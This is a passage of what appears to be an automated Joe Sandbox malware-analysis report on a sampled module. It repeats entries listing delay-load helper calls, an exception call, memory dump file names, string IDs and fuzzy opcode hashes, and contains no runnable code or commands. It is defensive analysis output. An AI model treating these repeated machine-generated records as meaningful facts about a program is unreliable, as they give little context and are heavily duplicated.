                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: 6099160d36f117dc998f50eee27b37e23b3c3802737712501e5fd0574e8ffe14
                                                                                              • Instruction ID: a8aac6331a2ceea49d4ba6c71a653f235781360813f7013d39d18684b3eab226
                                                                                              • Opcode Fuzzy Hash: 6099160d36f117dc998f50eee27b37e23b3c3802737712501e5fd0574e8ffe14
                                                                                              • Instruction Fuzzy Hash: 9CB012E2698104FC310461491C0AD77010DC0C1F11730803EFC05C00C2F88CAD040531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: 5bf6338444eb64f95c44e5140538734aa0d36ecfe9b0250dfbd2ba4716ec0e00
                                                                                              • Instruction ID: f102da5f107f2beb95c370f48942cf69abdc45853bd70827b87138b72a88a176
                                                                                              • Opcode Fuzzy Hash: 5bf6338444eb64f95c44e5140538734aa0d36ecfe9b0250dfbd2ba4716ec0e00
                                                                                              • Instruction Fuzzy Hash: F7B012D2798244FC3144624D5C0AD77010CC0C0F11730813FFC15C01C2E88C6C480631
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: 4d72e5dce5d629abc78cd4ec43d4bb5331eae5fb30fce5c888dc4ecb86db554b
                                                                                              • Instruction ID: e448adc2be7529ae8117fd4f26b18f8cc9155cd5f968c8b4505dc4c06c456418
                                                                                              • Opcode Fuzzy Hash: 4d72e5dce5d629abc78cd4ec43d4bb5331eae5fb30fce5c888dc4ecb86db554b
                                                                                              • Instruction Fuzzy Hash: 38B012D2698104EC3104624D1D0AD77010CC0C0F11730803FFC05C01C2EC9C6D0D0531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073EAF9
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: 3To
                                                                                              • API String ID: 1269201914-245939750
                                                                                              • Opcode ID: f36fce7c504868c251e386eda2104691bfc52d4cba62cb94fe3e5de55ea26f91
                                                                                              • Instruction ID: 56574086855cc050ac47dd8b611d7e8605b59798077466543eace658c0bfd77c
                                                                                              • Opcode Fuzzy Hash: f36fce7c504868c251e386eda2104691bfc52d4cba62cb94fe3e5de55ea26f91
                                                                                              • Instruction Fuzzy Hash: E1B092C629A142BC310462041E06C760109C080B91720902AB800880C2988C09060431
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: 8eab8e04029ff0f23f820115fbe32456e2ea4f005994b13f139de0a0798df150
                                                                                              • Instruction ID: 9c37b6cd09948e4b941c485dd5f0776bce596f680dd1c15a6aef064fdaf318e1
                                                                                              • Opcode Fuzzy Hash: 8eab8e04029ff0f23f820115fbe32456e2ea4f005994b13f139de0a0798df150
                                                                                              • Instruction Fuzzy Hash: 93B012E2698104EC3104A1491D0AD77018CC0C0F11B30403EFC05C00C2EC8C6D050531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E51F
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: PDu<s
                                                                                              • API String ID: 1269201914-3369385606
                                                                                              • Opcode ID: 28a3fc4ec456206b6ec0af0f2eee56efc74914e623f164d50907bfe31efa439c
                                                                                              • Instruction ID: 4bb749487c5ed41b4cf6c9ac71d5a0908d32c8e163562226e6035e5778c47619
                                                                                              • Opcode Fuzzy Hash: 28a3fc4ec456206b6ec0af0f2eee56efc74914e623f164d50907bfe31efa439c
                                                                                              • Instruction Fuzzy Hash: BEB012C1698240FC3204610C9C07D7F011DC0C1F16730523EF804C00C2E88C0D881531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E51F
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: PDu<s
                                                                                              • API String ID: 1269201914-3369385606
                                                                                              • Opcode ID: 1c224b7f8f184028c65ade817e5ba6e03d0083aea2c0e4a7ba4147fa95c66de8
                                                                                              • Instruction ID: 7ac1c5184173db6c92327c83140cb239f57f6b6f11df69f9496ab30698e9e3cc
                                                                                              • Opcode Fuzzy Hash: 1c224b7f8f184028c65ade817e5ba6e03d0083aea2c0e4a7ba4147fa95c66de8
                                                                                              • Instruction Fuzzy Hash: 1DB012C1698140FC310421281C0AD7F011DC0C1F15B30503EFC10C04C3A88C0E480431
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E580
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: Fjuns
                                                                                              • API String ID: 1269201914-22545314
                                                                                              • Opcode ID: 3cd89bb2d3a117e9db6846aae3cb861a4979d34eca39f8f710141420d672ecf4
                                                                                              • Instruction ID: fc47bfdc9d66926e6158a2243901488ec0f965ddff179fd0717612f9164461a6
                                                                                              • Opcode Fuzzy Hash: 3cd89bb2d3a117e9db6846aae3cb861a4979d34eca39f8f710141420d672ecf4
                                                                                              • Instruction Fuzzy Hash: 81B012C1A98200FC314461589D0BDB7015CC0C0F16730523EF804C10C2E88C0E540631
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E580
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: Fjuns
                                                                                              • API String ID: 1269201914-22545314
                                                                                              • Opcode ID: 6437bc5e725bff520f95d8a94a2ef3b4d50cd4afb5e135c50f76ae7010641e0d
                                                                                              • Instruction ID: f8df0129333290d6b736b76e0f00b1333c4cba1ca7d78415d3eacac73b3f21ca
                                                                                              • Opcode Fuzzy Hash: 6437bc5e725bff520f95d8a94a2ef3b4d50cd4afb5e135c50f76ae7010641e0d
                                                                                              • Instruction Fuzzy Hash: 11B012C1A98100FC310461985E0ADB7015CC0C0F16730523EF804C10C2EC8C0F150531
                                                                                              Uniqueness
                                                                                              Uniqueness Score: -1.00%
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E580
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: Fjuns
                                                                                              • API String ID: 1269201914-22545314
                                                                                              • Opcode ID: aec5d58d4fcf4faac53f874e2b101baefc9ae2b1578e0b997580411edc47b27a
                                                                                              • Instruction ID: c54eef1d7d1b9be1be6719bd88ae61aa8a9e5716e5675f7bf9b9f6f0af140625
                                                                                              • Opcode Fuzzy Hash: aec5d58d4fcf4faac53f874e2b101baefc9ae2b1578e0b997580411edc47b27a
                                                                                              • Instruction Fuzzy Hash: 8BB012C1A98104FD310461581D0ADB7014CC0C0F15730503EF804C10C2E88C0E140532
                                                                                              Uniqueness
                                                                                              Uniqueness Score: -1.00%
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: 9fbf25ac2b9b5b0b499d60e8f4e2f5d0a66c47882acc1be45cba97e426716483
                                                                                              • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                              • Opcode Fuzzy Hash: 9fbf25ac2b9b5b0b499d60e8f4e2f5d0a66c47882acc1be45cba97e426716483
                                                                                              • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                              Uniqueness
                                                                                              Uniqueness Score: -1.00%
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: 78b1d1c5a6f38b0db07ac8aa785b8a1325c4a077024dff318175c84e392efffb
                                                                                              • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                              • Opcode Fuzzy Hash: 78b1d1c5a6f38b0db07ac8aa785b8a1325c4a077024dff318175c84e392efffb
                                                                                              • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                              Uniqueness
                                                                                              Uniqueness Score: -1.00%
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: 70a14ca12acb4df2adbeb500d60d71127bf138d9ff39a95dbbff793352fb2c8e
                                                                                              • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                              • Opcode Fuzzy Hash: 70a14ca12acb4df2adbeb500d60d71127bf138d9ff39a95dbbff793352fb2c8e
                                                                                              • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                              Uniqueness
                                                                                              Uniqueness Score: -1.00%
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: fedc325d7e4e38f192449028dbefbbfe3b5d8dfc763e06f80b5518c73f6febdd
                                                                                              • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                              • Opcode Fuzzy Hash: fedc325d7e4e38f192449028dbefbbfe3b5d8dfc763e06f80b5518c73f6febdd
                                                                                              • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                              Uniqueness
                                                                                              Uniqueness Score: -1.00%
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: 091328a83e43285806315bf606f450be3d6a47de8f44cd993739081eebeb9e15
                                                                                              • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                              • Opcode Fuzzy Hash: 091328a83e43285806315bf606f450be3d6a47de8f44cd993739081eebeb9e15
                                                                                              • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                              Uniqueness
                                                                                              Uniqueness Score: -1.00%
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: 42cb8370aaf8bf681e892f04eb68d36d1388720af1edab64a0d3cd89f0e9c8e3
                                                                                              • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                              • Opcode Fuzzy Hash: 42cb8370aaf8bf681e892f04eb68d36d1388720af1edab64a0d3cd89f0e9c8e3
                                                                                              • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                              Uniqueness
                                                                                              Uniqueness Score: -1.00%
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: 74b954b9480d32e3ae32a4e2d314c9bd3eda1f446e26fb1481bd484e3eed68ee
                                                                                              • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                              • Opcode Fuzzy Hash: 74b954b9480d32e3ae32a4e2d314c9bd3eda1f446e26fb1481bd484e3eed68ee
                                                                                              • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
